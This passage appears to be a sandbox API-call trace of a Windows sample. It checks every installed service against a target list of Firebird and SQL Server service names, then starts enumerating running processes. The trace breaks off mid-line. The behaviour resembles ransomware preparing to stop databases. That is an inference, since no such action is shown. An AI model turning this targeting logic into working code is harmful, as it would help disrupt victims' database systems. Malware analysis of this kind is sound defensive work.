returned 1 [0220.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0220.442] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0220.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0220.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0220.442] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0220.442] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0220.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0220.442] lstrlenW (lpString="Audiosrv") returned 8 [0220.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0220.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0220.442] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0220.442] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0220.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0220.442] lstrlenW (lpString="BFE") returned 3 [0220.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0220.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0220.442] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0220.442] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0220.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0220.442] lstrlenW (lpString="BITS") returned 4 [0220.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0220.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0220.442] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0220.442] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0220.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0220.443] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0220.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0220.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0220.443] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0220.443] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0220.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0220.443] lstrlenW (lpString="CDPSvc") returned 6 [0220.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0220.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0220.443] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0220.443] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0220.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0220.443] lstrlenW (lpString="ClickToRunSvc") returned 13 [0220.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0220.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0220.443] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0220.443] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0220.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0220.443] lstrlenW (lpString="ClipSVC") returned 7 [0220.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0220.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0220.443] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0220.443] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0220.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0220.443] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0220.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0220.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0220.444] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0220.444] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0220.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0220.444] lstrlenW (lpString="CryptSvc") returned 8 [0220.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0220.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0220.444] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0220.444] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0220.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0220.444] lstrlenW (lpString="DcomLaunch") returned 10 [0220.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0220.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0220.444] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0220.444] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0220.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0220.444] lstrlenW (lpString="DeviceAssociationService") returned 24 [0220.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0220.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0220.444] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0220.444] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0220.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0220.444] lstrlenW (lpString="Dhcp") returned 4 [0220.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0220.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0220.444] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0220.444] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0220.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0220.444] lstrlenW (lpString="Dnscache") returned 8 [0220.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0220.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0220.444] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0220.444] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0220.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0220.444] lstrlenW (lpString="DoSvc") returned 5 [0220.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0220.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0220.445] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0220.445] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0220.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0220.445] lstrlenW (lpString="DPS") returned 3 [0220.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0220.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0220.445] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0220.445] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0220.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0220.445] lstrlenW (lpString="DusmSvc") returned 7 [0220.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0220.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0220.445] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0220.445] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0220.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0220.445] lstrlenW (lpString="EventLog") returned 8 [0220.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0220.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0220.445] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0220.445] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0220.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0220.445] lstrlenW (lpString="EventSystem") returned 11 [0220.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0220.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0220.445] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0220.445] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0220.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0220.445] lstrlenW (lpString="FontCache") returned 9 [0220.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0220.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0220.445] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0220.445] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0220.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0220.445] lstrlenW (lpString="gpsvc") returned 5 [0220.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0220.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0220.446] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0220.446] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0220.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0220.446] lstrlenW (lpString="iphlpsvc") returned 8 [0220.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0220.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0220.446] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0220.446] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0220.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0220.446] lstrlenW (lpString="KeyIso") returned 6 [0220.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0220.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0220.446] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0220.446] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0220.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0220.446] lstrlenW (lpString="LanmanServer") returned 12 [0220.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0220.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0220.446] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0220.446] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0220.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0220.446] lstrlenW (lpString="LanmanWorkstation") returned 17 [0220.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0220.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0220.446] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0220.446] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0220.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0220.446] lstrlenW (lpString="lfsvc") returned 5 [0220.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0220.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0220.446] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0220.446] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0220.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0220.446] lstrlenW (lpString="LicenseManager") returned 14 [0220.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0220.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0220.447] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0220.447] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0220.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0220.447] lstrlenW (lpString="lmhosts") returned 7 [0220.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0220.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0220.447] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0220.447] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0220.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0220.447] lstrlenW (lpString="LSM") returned 3 [0220.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0220.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0220.447] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0220.447] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0220.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0220.447] lstrlenW (lpString="MpsSvc") returned 6 [0220.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0220.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0220.447] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0220.447] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0220.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0220.447] lstrlenW (lpString="NcbService") returned 10 [0220.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0220.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0220.447] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0220.447] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0220.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0220.447] lstrlenW (lpString="netprofm") returned 8 [0220.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0220.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0220.447] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0220.447] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0220.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0220.447] lstrlenW (lpString="NlaSvc") returned 6 [0220.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0220.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0220.448] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0220.448] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0220.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0220.448] lstrlenW (lpString="nsi") returned 3 [0220.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0220.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0220.448] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0220.448] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0220.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0220.448] lstrlenW (lpString="PcaSvc") returned 6 [0220.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0220.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0220.448] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0220.448] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0220.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0220.448] lstrlenW (lpString="PlugPlay") returned 8 [0220.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0220.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0220.448] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0220.448] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0220.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0220.448] lstrlenW (lpString="Power") returned 5 [0220.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0220.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0220.448] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0220.448] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0220.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0220.448] lstrlenW (lpString="ProfSvc") returned 7 [0220.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0220.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0220.448] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0220.448] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0220.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0220.448] lstrlenW (lpString="RpcEptMapper") returned 12 [0220.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0220.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0220.449] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0220.449] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0220.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0220.449] lstrlenW (lpString="RpcSs") returned 5 [0220.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0220.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0220.449] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0220.449] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0220.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0220.449] lstrlenW (lpString="SamSs") returned 5 [0220.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0220.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0220.449] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0220.449] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0220.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0220.449] lstrlenW (lpString="Schedule") returned 8 [0220.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0220.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0220.449] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0220.449] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0220.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0220.449] lstrlenW (lpString="SecurityHealthService") returned 21 [0220.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0220.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0220.449] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0220.449] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0220.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0220.449] lstrlenW (lpString="SENS") returned 4 [0220.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0220.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0220.449] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0220.449] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0220.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0220.449] lstrlenW (lpString="ShellHWDetection") returned 16 [0220.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0220.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0220.450] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0220.450] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0220.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0220.450] lstrlenW (lpString="Spooler") returned 7 [0220.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0220.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0220.450] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0220.450] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0220.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0220.450] lstrlenW (lpString="sppsvc") returned 6 [0220.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0220.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0220.450] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0220.450] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0220.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0220.450] lstrlenW (lpString="SSDPSRV") returned 7 [0220.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0220.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0220.450] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0220.450] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0220.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x430 [0220.455] Process32FirstW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.455] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.456] lstrlenW (lpString="System") returned 6 [0220.456] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.457] lstrlenW (lpString="smss.exe") returned 8 [0220.457] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.458] lstrlenW (lpString="csrss.exe") returned 9 [0220.458] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.459] lstrlenW (lpString="wininit.exe") returned 11 [0220.459] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.459] lstrlenW (lpString="csrss.exe") returned 9 [0220.459] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.460] lstrlenW (lpString="winlogon.exe") returned 12 [0220.460] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.461] lstrlenW (lpString="services.exe") returned 12 [0220.461] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.462] lstrlenW (lpString="lsass.exe") returned 9 [0220.462] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.462] lstrlenW (lpString="svchost.exe") returned 11 [0220.462] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: 